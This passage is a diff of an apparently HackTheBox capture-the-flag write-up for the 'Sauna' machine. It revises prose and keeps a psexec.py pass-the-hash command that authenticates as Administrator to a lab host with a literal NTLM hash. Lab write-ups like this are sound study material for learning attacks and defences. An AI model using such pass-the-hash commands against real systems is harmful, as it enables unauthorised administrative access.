galenlim/hackthebox-htb-writeups/sauna.md

 [*] Cleaning up...
 ```

-Now that we have the hashes, we can use them to get admin access.
+Now that we have the hashes, we can use them to get SYSTEM access.

-### Passing The Hash
+## Passing The Hash

-The SMB port is open, so psexec is an option.
+From our port scan, we know that we have access to the SMB port, so psexec is an option.

 `./psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff`